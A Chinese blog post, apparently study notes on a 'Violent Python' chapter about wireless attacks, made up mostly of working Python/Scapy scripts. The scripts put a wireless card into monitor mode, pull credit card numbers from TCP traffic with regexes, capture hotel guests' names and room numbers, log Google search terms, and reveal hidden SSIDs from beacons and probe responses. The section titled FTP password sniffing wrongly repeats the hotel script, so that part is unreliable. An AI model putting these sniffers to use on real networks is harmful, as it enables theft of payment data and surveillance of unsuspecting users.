安科网

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

懒人在思考

懒人在思考

2018-05-28

关注 关注

本章大部分代码都是实现了但是缺乏相应的应用环境,想具体测试的可以直接找到对应的环境或者自行修改脚本以适应生活常用的环境。

1、搭建无线网络攻击环境:

用Scapy测试无线网卡的嗅探功能:

插入无线网卡,输入iwconfig命令查看网卡信息:

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

将可能会影响进行无线实验的因素排除掉,然后将网卡设置为混杂模式:

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

确认进入Monitor模式:

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

测试嗅探无线网络的代码:

#!/usr/bin/python
#coding=utf-8
from scapy.all import *

def pktPrint(pkt):
    if pkt.haslayer(Dot11Beacon):
        print '[+] Detected 802.11 Beacon Frame'
    elif pkt.haslayer(Dot11ProbeReq):
        print '[+] Detected 802.11 Probe Request Frame'
    elif pkt.haslayer(TCP):
        print '[+] Detected a TCP Packet'
    elif pkt.haslayer(DNS):
        print '[+] Detected a DNS Packet'

conf.iface = 'wlan0mon'
sniff(prn=pktPrint)

运行结果:

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

安装Python蓝牙包:

apt-get update

apt-get install python-bluez bluetooth python-boexftp

另外还需要一个蓝牙设备,测试能否识别该设备:hciconfig

由于本人没有蓝牙设备,蓝牙部分就先不进行测试。

2、绵羊墙——被动窃听无线网络中传输的秘密:

使用Python正则表达式嗅探信用卡信息:

这里主要搜找书上所列的3种常用的信用卡:Visa、MasterCard和American Express。

测试代码:

#!/usr/bin/python
#coding=utf-8
import re

def findCreditCard(raw):
    # American Express信用卡由34或37开头的15位数字组成
    americaRE = re.findall('3[47][0-9]{13}', raw)
    if americaRE:
        print '[+] Found American Express Card: ' + americaRE[0]

def main():
    tests = []
    tests.append('I would like to buy 1337 copies of that dvd')
    tests.append('Bill my card: 378282246310005 for \$2600')
    for test in tests:
        findCreditCard(test)

if __name__ == '__main__':
    main()

运行结果:

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

接着就加入Scapy来嗅探TCP数据包实现嗅探功能:

#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *

def findCreditCard(pkt):
    raw = pkt.sprintf('%Raw.load%')
    # American Express信用卡由34或37开头的15位数字组成
    americaRE = re.findall('3[47][0-9]{13}', raw)
    # MasterCard信用卡的开头为51~55,共16位数字
    masterRE = re.findall('5[1-5][0-9]{14}', raw)
    # Visa信用卡开头数字为4,长度为13或16位
    visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)

    if americaRE:
        print '[+] Found American Express Card: ' + americaRE[0]
    if masterRE:
        print '[+] Found MasterCard Card: ' + masterRE[0]
    if visaRE:
        print '[+] Found Visa Card: ' + visaRE[0]

def main():
    parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Credit Card Sniffer.'
        sniff(filter='tcp', prn=findCreditCard, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

运行结果:

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

当然并没有这几种信用卡,而且在本地不常见。具体其他信用卡号的规律可以自己发掘一下。

嗅探宾馆住客:

这段脚本所在的网络环境是作者所在宾馆的环境,不同环境肯定有区别,可以自行抓包修改脚本实现嗅探。

#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGuest(pkt):
    raw = pkt.sprintf('%Raw.load%')
    name = re.findall('(?i)LAST_NAME=(.*)&', raw)
    room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
    if name:
        print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])

def main():
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Hotel Guest Sniffer.'
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

当然没有嗅探出信息:

《Python绝技:运用Python成为顶级黑客》 用Python进行无线网络攻击

编写谷歌键盘记录器:

Google搜索,由“q=”开始,中间是要搜索的字符串,并以“&”终止,字符“pg=”后接的是上一个搜索的内容。

#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGoogle(pkt):
    if pkt.haslayer(Raw):
        payload = pkt.getlayer(Raw).load
        if 'GET' in payload:
            if 'google' in payload:
                r = re.findall(r'(?i)\&q=(.*?)\&', payload)
                if r:
                    search = r[0].split('&')[0]
                    search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ')
                    print '[+] Searched For: ' + search

def main():
    parser = optparse.OptionParser('[*]Usage: python googleSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Google Sniffer.'
        sniff(filter='tcp port 80', prn=findGoogle)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

嗅探不到什么结果的就不给出截图了,后面部分也一样。

嗅探FTP登录口令:

#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGuest(pkt):
    raw = pkt.sprintf('%Raw.load%')
    name = re.findall('(?i)LAST_NAME=(.*)&', raw)
    room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
    if name:
        print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])

def main():
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Hotel Guest Sniffer.'
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

3、你带着笔记本电脑去过哪里?Python告诉你:

侦听802.11 Probe请求:

#!/usr/bin/python
#utf-8
from scapy.all import *

interface = 'wlan0mon'
probeReqs = []

def sniffProbe(p):
    if p.haslayer(Dot11ProbeReq):
        netName = p.getlayer(Dot11ProbeReq).info
        if netName not in probeReqs:
            probeReqs.append(netName)
            print '[+] Detected New Probe Request: ' + netName

sniff(iface=interface, prn=sniffProbe)

寻找隐藏网络的802.11信标:

def sniffDot11(p):
    if p.haslayer(Dot11Beacon):
        if p.getlayer(Dot11Beacon).info == '':
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hiddenNets:
                print '[-] Detected Hidden SSID: with MAC:' + addr2
                hiddenNets.append(addr2)

找出隐藏的802.11网络的网络名:

#!/usr/bin/python
#coding=utf-8
import sys
from scapy import *

interface = 'wlan0mon'
hiddenNets = []
unhiddenNets = []

def sniffDot11(p):
    if p.haslayer(Dot11ProbeResp):
        addr2 = p.getlayer(Dot11).addr2
        if (addr2 in hiddenNets) & (addr2 not in unhiddenNets):
            netName = p.getlayer(Dot11ProbeResp).info
            print '[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2
            unhiddenNets.append(addr2)

    if p.haslayer(Dot11Beacon):
        if p.getlayer(Dot11Beacon).info == '':
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hiddenNets:
                print '[-] Detected Hidden SSID: with MAC:' + addr2
                hiddenNets.append(addr2)

sniff(iface=interface, prn=sniffDot11)

本章后面的代码实用性不高,暂时也不贴该块的代码了,也没有测试的环境。

python 编程语言

懒人在思考

懒人在思考

0 关注 1 粉丝 0 动态

关注 关注

相关推荐

致命错误!Python开发者的7个崩溃瞬间

本文转载自公众号“读芯术”。毫无疑问,Python是当今使用最为广泛的编程语言。但无论你经验多丰富,或是已使用过多少种语言,切换到Python时都不能保证非常顺利。具有面向对象编程背景的开发人员容易忽略Python的惯用特性,很可能会滥用编程结构,从而产生

huavhuahua 2020-11-20

VS Code 中 Python 扩展的部分功能重构,支持 R 和 Julia

11 月 12 日,微软将 Jupyter Notebook 支持从 Python 扩展中独立出来,发布新的 Jupyter 扩展,支持智能感知,调试等功能的交互式编程和计算。Jupyter 扩展通过新的“ Native Notebooks Experi

weiiron 2020-11-16

学习Python:脑筋急转弯和其他有趣技巧

而咨询和研讨会提供商353Solutions的首席执行官Miki Tebeka却不是这样,当疫情开始后,他开始编写Python练习书。Tebeka说他已经使用Python多年,目前正在教授有关编程语言的讲习班。Tebeka表示,参与Twitter很容易,有

cakecc00 2020-11-15

使用开源可视化工具来理解你的Python代码

VizTracer 工具可以可视化并跟踪 Python 代码,让你可以更深入地了解其工作原理。随着 Python 项目变得越来越大、越复杂,理解起它来就变得充满挑战性。即使是你自己独自编写了整个项目,也不可能完全知道项目是如何工作的。为了能更好的理解你的代

千锋 2020-11-15

Python之父Guido Van Rossum宣布加入微软

在从 Dropbox 退休一年后,64 岁的 Python 之父吉多 · 范罗苏姆宣布复出并加盟微软。然而,今天看来他的退休之旅已经结束。van Rossum 表示,他加入微软后,将致力于「使用户更好地使用 Python」。微软发言人表示欢迎 van R

JakobHu 2020-11-14

Python之父,现在成为微软打工人

Python之父,现在成了微软的打工人。没错,全世界程序员们最喜欢的编程语言的创造者,自述耐不住退休生活的寂寞,重返岗位发光发热。又为什么选择微软?几个小时前,Guido Van Rossum本人发推宣布了这个消息,他说:「退休生活太无聊了,我决定加入微软

guangcheng 2020-11-13

2020年11月编程语言排行:C、Python、Java

2020年11月编程语言排行:C、Python、Java,9-20名也有不同程度的变化:R语言、Perl 和 Go 语言名次都有大幅提升,分别为9名、12名和13名;Swift、Ruby、Delphl/Object Pascal 和 Objective-

xirongxudlut 2020-11-10

GitHub 上适合新手的开源项目(Python 篇)

随着 Python 语言的流行,越来越多的人加入到了 Python 的大家庭中。为什么这么多人学 Python ?我要喊出那句话了:“人生苦短,我用 Python!”,正是因为语法简单、容易学习,所以 Python 深受大家喜爱。Python 初学者在迈过

solarLan 2020-11-09

TIOBE 11月编程语言榜单出炉,Python势不可挡,超越Java!

TIOBE索引自开始以来到今天已有将近20年前之久,是首次出现Java和C语言不再占据前两名的位置。C语言仍然是第一,但现在是Python占据了第二的位置。有人说,Python最近的流行度激增是因为数据挖掘、AI和数值计算等领域的蓬勃发展。我认为,Pyth

pythonxuexi 2020-11-08

属于新十年的开发语言:Go语言可能很快会取代Python

30年前,Python首次亮相,它花了20年才得到开发者的赞赏。如今,它已经成为开发者第二喜爱的语言。尤其是在过去五年里,Python用户激增,成为机器学习和数据科学开发者的首选语言。在未来几年里,Python在这些领域的主导地位必然是很难被动摇的。但与较

文山羊 2020-11-07

Python曾是程序员的“瑞士军刀”,而如今正被慢慢取代

上世纪90年代初,Python面世了。近30年来,关于它的“炒作”一直没有少过。当然,编程界花了至少20年的时间才认识到它,但自那以后,它的流行程度远远超过了C、C#、Java甚至Javascript。尽管Python目前在数据科学和机器学习领域,以及某些

susmote 2020-11-07

编程语言排行榜:Python 排名第二,首次领先于 Java

Tiobe 这么多年以来发布的指数中,29 岁的 Python 首次超过了 25 岁 Java,成为第二受欢迎的编程语言。在 最新的 Tiobe 指数 中,数据科学和机器学习项目的首选语言 Python,现在排名仅次于 C 语言,排在第二位,将 Java

wuShiJingZuo 2020-11-05

TIOBE 11月榜单:Python挤掉了Java!

根据Tiobe之最新编程语言排名。Java语言的流行度在本月持续下降,而Python语言正式登上世界第二大语言的宝座。若Python真的超越了Java,那将是Tiobe编程排行榜在创立以来最大的变化,在知道该排名从2001年开始,Java一直占据前两名未变

Pythonjeff远 2020-11-06

Python在下个十年依然重要吗?

愚者多怨,仁者不言,生活中就是会有很多爱唱反调的人,但不管怎么说Python 在接下来十年仍然会很重要。“人红是非多”,Python是一门很棒的编程语言,虽然有许许多多的批评,依旧挡不住它红火的势头。一个东西之所以能流行必然有它的过人之处,那这些批评是对的

jacktangj 2020-11-04

TIOBE 11 月榜单:Python 挤掉 Java,成功跃至第二

TIOBE 公布了 2020 年 11 月的编程语言排行榜。Python 已成功跃居榜单第二名,本月排名率为 12.12%; Java 被挤到第三位,排名率降至 11.68%。自有 TIOBE 榜单以来,C 和 Java 之前一直占据着前两名的位置。然而

lousir 2020-11-04

python 发送get请求接口详解

  如果想用python做接口测试,我们首先有不得不了解和学习的模块。虽然Python内置的urllib模块,用于访问网络资源。但是,它用起来比较麻烦,而且,缺少很多实用的高级功能。更好的方案是使用。它是一个Python第三方库,处理URL资源特别方便。R

YENCSDN 2020-11-17

python 使用tkinter+you-get实现视频下载器

#获取屏幕尺寸以计算布局参数,使窗口居屏幕中央,其中width和height为界面宽和高。#阻止窗口调整大小

lsjweiyi 2020-11-17

python中requests模拟登录的三种方式(携带cookie/session进行请求网站)

session是在cookie的基础上,服务端设置session时会向浏览器发送设置一个设置cookie的请求,这个cookie包括session的id当访问服务端时带上这个session_id就可以获取到用户保存在服务端对应的session. 到此这篇关

houmenghu 2020-11-17

python开发一个解析protobuf文件的简单编译器

最近刚刚用python写完了一个解析protobuf文件的简单编译器,深感ply实现词法分析和语法分析的简洁方便。乘着余热未过,头脑清醒,记下一点总结和心得,方便各位pythoner参考使用。如果你不是从事编译器或者解析器的开发工作,你可能从未听说过ply

Erick 2020-11-17

python 下载文件的多种方法汇总

本文档介绍了 Python 下载文件的各种方式,从下载简单的小文件到用断点续传的方式下载大文件。使用 Requests 模块的 get 方法从一个 url 上下载文件,在 python 爬虫中经常使用它下载简单的网页内容。使用 python 内置的 url

HeyShHeyou 2020-11-17
懒人在思考

懒人在思考

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号